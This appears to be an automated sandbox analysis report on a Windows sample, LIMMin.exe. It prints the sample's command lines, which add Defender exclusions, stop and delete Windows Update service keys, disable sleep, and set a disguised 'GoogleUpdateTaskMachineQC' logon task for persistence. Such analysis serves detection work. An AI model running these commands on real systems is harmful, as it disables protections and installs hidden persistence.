Analysis
-
max time kernel
27s -
max time network
32s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
30-06-2023 12:25
Static task
static1
Behavioral task
behavioral1
Sample
LIMMin.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
LIMMin.exe
Resource
win10v2004-20230621-en
General
-
Target
LIMMin.exe
-
Size
3.6MB
-
MD5
d0525e69e54066d5b3764acefd16a754
-
SHA1
513304e7eca83acedad4655a135a6f4c2c1f4aed
-
SHA256
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce
-
SHA512
b958797b913b1860daa2cdf4f6741835042e170fea4c4b5f3ae61432a9e24054dbcd40dbc4871d19b12d3f40d90523490caa37e6152d66850c05f18b7d738f03
-
SSDEEP
98304:vKNU8zvQiW+xPSCcgu3ebV6GDRjar2H2wKr3:avhWXrycG1jamKr3
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
LIMMin.exedescription pid Process procid_target PID 1628 created 1260 1628 LIMMin.exe 10 PID 1628 created 1260 1628 LIMMin.exe 10 PID 1628 created 1260 1628 LIMMin.exe 10 PID 1628 created 1260 1628 LIMMin.exe 10 PID 1628 created 1260 1628 LIMMin.exe 10 -
Drops file in Drivers directory 1 IoCs
Processes:
LIMMin.exedescription ioc Process File created C:\Windows\System32\drivers\etc\hosts LIMMin.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid Process 536 cmd.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid Process 2032 sc.exe 2036 sc.exe 1360 sc.exe 1920 sc.exe 1600 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
LIMMin.exepowershell.exepowershell.exepid Process 1628 LIMMin.exe 1628 LIMMin.exe 1996 powershell.exe 1628 LIMMin.exe 1628 LIMMin.exe 1628 LIMMin.exe 1628 LIMMin.exe 1628 LIMMin.exe 1628 LIMMin.exe 584 powershell.exe 1628 LIMMin.exe 1628 LIMMin.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exedescription pid Process Token: SeDebugPrivilege 1996 powershell.exe Token: SeShutdownPrivilege 976 powercfg.exe Token: SeShutdownPrivilege 600 powercfg.exe Token: SeDebugPrivilege 584 powershell.exe Token: SeShutdownPrivilege 1576 powercfg.exe Token: SeShutdownPrivilege 1808 powercfg.exe -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
cmd.execmd.exepowershell.execmd.exedescription pid Process procid_target PID 292 wrote to memory of 976 292 cmd.exe 36 PID 292 wrote to memory of 976 292 cmd.exe 36 PID 292 wrote to memory of 976 292 cmd.exe 36 PID 1108 wrote to memory of 2032 1108 cmd.exe 37 PID 1108 wrote to memory of 2032 1108 cmd.exe 37 PID 1108 wrote to memory of 2032 1108 cmd.exe 37 PID 1108 wrote to memory of 2036 1108 cmd.exe 38 PID 1108 wrote to memory of 2036 1108 cmd.exe 38 PID 1108 wrote to memory of 2036 1108 cmd.exe 38 PID 1108 wrote to memory of 1360 1108 cmd.exe 39 PID 1108 wrote to memory of 1360 1108 cmd.exe 39 PID 1108 wrote to memory of 1360 1108 cmd.exe 39 PID 292 wrote to memory of 600 292 cmd.exe 40 PID 292 wrote to memory of 600 292 cmd.exe 40 PID 292 wrote to memory of 600 292 cmd.exe 40 PID 1108 wrote to memory of 1920 1108 cmd.exe 41 PID 1108 wrote to memory of 1920 1108 cmd.exe 41 PID 1108 wrote to memory of 1920 1108 cmd.exe 41 PID 292 wrote to memory of 1576 292 cmd.exe 42 PID 292 wrote to memory of 1576 292 cmd.exe 42 PID 292 wrote to memory of 1576 292 cmd.exe 42 PID 292 wrote to memory of 1808 292 cmd.exe 43 PID 292 wrote to memory of 1808 292 cmd.exe 43 PID 292 wrote to memory of 1808 292 cmd.exe 43 PID 1108 wrote to memory of 1600 1108 cmd.exe 44 PID 1108 wrote to memory of 1600 1108 cmd.exe 44 PID 1108 wrote to memory of 1600 1108 cmd.exe 44 PID 1108 wrote to memory of 1044 1108 cmd.exe 45 PID 1108 wrote to memory of 1044 1108 cmd.exe 45 PID 1108 wrote to memory of 1044 1108 cmd.exe 45 PID 1108 wrote to memory of 1384 1108 cmd.exe 46 PID 1108 wrote to memory of 1384 1108 cmd.exe 46 PID 1108 wrote to memory of 1384 1108 cmd.exe 46 PID 1108 wrote to memory of 1132 1108 cmd.exe 47 PID 1108 wrote to memory of 1132 1108 cmd.exe 47 PID 1108 wrote to memory of 1132 1108 cmd.exe 47 PID 1108 wrote to memory of 748 1108 cmd.exe 48 PID 1108 wrote to memory of 748 1108 cmd.exe 48 PID 1108 wrote to memory of 748 1108 cmd.exe 48 PID 1108 wrote to memory of 1408 1108 cmd.exe 49 PID 1108 wrote to memory of 1408 1108 cmd.exe 49 PID 1108 wrote to memory of 1408 1108 cmd.exe 49 PID 584 wrote to memory of 1040 584 powershell.exe 50 PID 584 wrote to memory of 1040 584 powershell.exe 50 PID 584 wrote to memory of 1040 584 powershell.exe 50 PID 536 wrote to memory of 1300 536 cmd.exe 53 PID 536 wrote to memory of 1300 536 cmd.exe 53 PID 536 wrote to memory of 1300 536 cmd.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1260
-
C:\Users\Admin\AppData\Local\Temp\LIMMin.exe"C:\Users\Admin\AppData\Local\Temp\LIMMin.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
PID:1628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2032
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2036
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1360
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1920
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1044
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1384
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1132
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:748
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1408
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:292 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uwjcnslmt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'3⤵
- Creates scheduled task(s)
PID:1040
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\LIMMin.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1300
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59750868caa9581527f4c4e1c502ccfe4
SHA172bbafc35574a64df5d343ecc6bc87852c26c6dc
SHA25697a403ea107694c4df71514f7544fabb22dc9dafd886ca163ed85ed465585978
SHA5125bb3b6aedf32f159a4e35fc4857123bc5d31f7b74cb73869d8b14817f62fb0d3fa9dc5e0f3a847314ac796e93d133e1cc803e0620e2edafffd9891a789ac7fd8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XP9D0T74BA4VG220DQ8E.temp
Filesize7KB
MD59750868caa9581527f4c4e1c502ccfe4
SHA172bbafc35574a64df5d343ecc6bc87852c26c6dc
SHA25697a403ea107694c4df71514f7544fabb22dc9dafd886ca163ed85ed465585978
SHA5125bb3b6aedf32f159a4e35fc4857123bc5d31f7b74cb73869d8b14817f62fb0d3fa9dc5e0f3a847314ac796e93d133e1cc803e0620e2edafffd9891a789ac7fd8